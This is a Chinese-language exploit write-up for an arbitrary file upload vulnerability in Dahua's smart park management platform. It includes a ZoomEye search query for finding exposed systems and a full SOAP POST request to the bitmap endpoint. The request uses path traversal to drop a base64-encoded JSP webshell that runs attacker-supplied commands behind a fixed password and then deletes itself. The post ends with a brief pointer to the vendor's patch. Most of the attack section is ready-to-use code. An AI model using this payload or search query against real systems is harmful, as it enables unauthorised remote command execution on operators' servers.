0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

Dahua Smart Parking Management是中国大华(Dahua)公司的一个停车解决方案。

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致远程未授权攻击者可利用此漏洞上传任意文件,最终获取服务器权限。

0x02影响版本

大华智慧园区综合管理平台

0x03漏洞复现

zoomeye语法

app:"大华智慧园区综合管理平台"

1.访问漏洞环境


2.对漏洞进行复现

 POC (POST)

漏洞复现

文件上传(内容base64编码)

POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 990
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
    <soapenv:Header/>           
      <soapenv:Body>
             <res:uploadPicFile>
                    <arg0>
                   <picPath>/../rce.jsp</picPath>
                    </arg0>
                    <arg1>PCUgaWYoIjEyMyIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpeyBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7IGludCBhID0gLTE7IGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07IG91dC5wcmludCgiPHByZT4iKTsgd2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXsgb3V0LnByaW50bG4obmV3IFN0cmluZyhiKSk7IH0gb3V0LnByaW50KCI8L3ByZT4iKTsgfSAgb3V0LnByaW50bG4oIkhlbGxvIFdvcmxkISIpO25ldyBqYXZhLmlvLkZpbGUoYXBwbGljYXRpb24uZ2V0UmVhbFBhdGgocmVxdWVzdC5nZXRTZXJ2bGV0UGF0aCgpKSkuZGVsZXRlKCk7ICU+</arg1>
                </res:uploadPicFile>
    </soapenv:Body>
</soapenv:Envelope>

解析上传内容执行id命令(漏洞存在)

3.nuclei工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://support.dahuatech.com/